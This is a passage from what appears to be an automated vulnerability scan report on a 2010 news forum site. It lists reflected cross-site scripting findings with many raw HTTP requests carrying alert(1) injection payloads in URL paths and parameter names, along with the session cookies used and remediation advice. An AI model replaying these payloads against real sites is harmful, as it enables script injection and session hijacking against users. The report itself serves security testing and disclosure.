GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:29 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
3.108. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/oil-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:01 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134
3.111. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/oil-price-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19412
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:07 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218
3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23285
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:33 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136
3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/war-crisis-in-september
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 162532
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:40 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102
3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/xml/comments
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:46 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104
3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/xml/poll-link
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
